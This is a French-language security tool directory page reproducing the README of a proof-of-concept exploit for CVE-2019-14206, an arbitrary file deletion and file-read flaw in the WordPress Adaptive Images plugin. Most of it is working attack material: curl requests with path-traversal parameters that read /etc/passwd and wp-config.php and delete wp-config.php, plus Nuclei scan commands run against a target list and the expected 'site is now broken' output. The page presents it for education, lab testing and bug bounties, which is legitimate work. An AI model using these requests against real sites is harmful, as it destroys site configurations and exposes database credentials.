Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2019-14206-poc — Exploit de preuve de concept pour CVE-2019-14206, démontrant la suppression arbitraire de fichiers dans le plugin WordPress Adaptive Images. Inclus un laboratoire Docker, un modèle Nuclei et des scripts de test manuels pour l'éducation et la validation en sécurité. | Kitploit
Outils/GitHubGitHub/developerfred/cve-2019-14206-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubdeveloperfred/cve-2019-14206-poc

cve-2019-14206-poc

Exploit de preuve de concept pour CVE-2019-14206, démontrant la suppression arbitraire de fichiers dans le plugin WordPress Adaptive Images. Inclus un laboratoire Docker, un modèle Nuclei et des scripts de test manuels pour l'éducation et la validation en sécurité.

Voir le dépôt
5il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-14206 - Adaptive Images pour WordPress - Suppression arbitraire de fichiers

📋 Table des matières

  1. À propos de la vulnérabilité
  2. Prérequis
  3. Installation
  4. Méthodes de test
    • Test rapide
    • Test complet avec Docker
    • Test avec Nuclei
    • Test manuel
  5. Interprétation des résultats
  6. Nettoyage
  7. Dépannage
  8. Mitigation
  9. Avertissement légal

🎯 À propos de la vulnérabilité

CVE-ID : CVE-2019-14206
Sévérité : Élevée (CVSS 6.5)
Plugin concerné : Adaptive Images pour WordPress
Versions affectées : < 0.6.67

Que permet cette vulnérabilité ?

Cette vulnérabilité permet à un attaquant distant non authentifié de supprimer des fichiers arbitraires sur le serveur WordPress en exploitant le plugin Adaptive Images.

Impact réel :

  • ❌ Suppression de wp-config.php provoquant une panne complète du site
  • ❌ Exposition des identifiants de la base de données via LFI
  • ⚠️ Chaîne d'attaque menant à une RCE (Exécution de code à distance)
  • 🔴 Compromission totale du site WordPress

Cause racine :

// Le plugin utilise une entrée utilisateur SANS nettoyage
$settings = $_REQUEST['adaptive-images-settings'];

// Construit le chemin du fichier avec des paramètres contrôlés par l'attaquant
$cache_file = $wp_content . '/' . $cache_dir . '/' . $resolution . $request_uri;

// SUPPRIME un fichier arbitraire
unlink($cache_file);

💻 Prérequis

Exigences minimales :

  • Système d'exploitation : macOS, Linux ou Windows
  • Nuclei : Version 3.0 ou supérieure (Installer)
  • Bash : Version 4.0 ou supérieure
  • curl : Pour les tests manuels
  • PHP : Version 7.0+ (optionnel, pour les tests avec serveur intégré)

Vérification des prérequis :

# Vérifier Nuclei
nuclei --version

# Vérifier Bash
bash --version

# Vérifier curl
curl --version

# Vérifier PHP (optionnel)
php --version 2>/dev/null || echo "PHP non disponible (optionnel)"

🚀 Installation

Étape 1 : Cloner ou télécharger les fichiers

# Si vous êtes dans le répertoire nuclei-templates
cd /Volumes/Codingsh/experimentos/nuclei-templates

# Ou téléchargez les fichiers nécessaires
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates

Étape 2 : Vérifier la structure des fichiers

# Vérifier si les fichiers existent
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/

Étape 3 : Rendre les scripts exécutables

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh

🧪 Méthodes de test

1. Test rapide ⏱️ 2 minutes

Exécutez la démonstration complète qui simule toute l'exploitation :

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh

Ce qui se passe :

  • Crée un environnement de test complet
  • Simule la vulnérabilité
  • Montre la suppression de fichier
  • Valide le template Nuclei

Résultat attendu :

[🎉] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
✅ Vulnerability: CVE-2019-14206 confirmed
✅ Template Status: Production ready

2. Test complet avec Docker 🐳 10 minutes

Étape 1 : Démarrer l'environnement Docker

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

# Si Docker est en cours d'exécution
docker-compose up -d

# Si Docker n'est PAS en cours d'exécution, utilisez le simulateur
./docker-test-full.sh

Étape 2 : Accéder à WordPress

# L'environnement sera disponible à l'adresse
# http://localhost:8888

Étape 3 : Vérifier le plugin vulnérable

# Vérifier si le script vulnérable existe
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php

Étape 4 : Exécuter les tests

# Test LFI
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Test de suppression de fichier
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Vérifier si wp-config.php a été supprimé
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php

3. Test avec Nuclei 🎯 5 minutes

Étape 1 : Préparer la liste des cibles

# Créer un fichier de cibles
cat > targets.txt << 'EOF'
http://localhost:8888
https://target-wordpress-site.com
EOF

Étape 2 : Exécuter le scan

# Scan basique
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt

# Scan détaillé
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -v

# Scan avec débogage (OBLIGATOIRE pour les primes)
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -debug

# Sauvegarder les résultats
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -o results.txt

Étape 3 : Interpréter les résultats

# Voir les résultats
cat results.txt

# Les résultats positifs contiendront :
# [CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion

4. Test manuel 🔧 10 minutes

Étape 1 : Démarrer le serveur PHP

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test
php -S localhost:8888

Étape 2 : Tester LFI (Lecture de fichiers)

# Essayer de lire /etc/passwd
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Essayer de lire wp-config.php
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../wp-config.php"

Résultat attendu (LFI) :

=== CVE-2019-14206 Vulnerability Test ===

[*] Settings received:
  source_file = /etc/passwd
  ...

[*] Cache file: /var/www/html/wp-content/ai-cache/1920/etc/passwd
[*] Source file: /etc/passwd

Étape 3 : Tester la suppression de fichiers

# Vérifier si wp-config.php existe AVANT
ls -la wp-config.php

# Exécuter l'exploit
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Vérifier si wp-config.php a été supprimé APRÈS
ls -la wp-config.php

Résultat attendu (Suppression de fichier) :

[+] SUCCESS: Arbitrary file deletion vulnerability confirmed!
[+] Target file deleted: ./../../..//wp-config.php

📊 Interprétation des résultats

Résultat positif (Vulnérable) :

[CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion
http://target-wordpress-site.com/wp-content/plugins/adaptive-images/adaptive-images-script.php

Matchers matched:
- Plugin detected
- LFI vulnerability confirmed
- Arbitrary file deletion possible

Résultat négatif (Non vulnérable) :

[N/A] No results found
Télécharger l’outil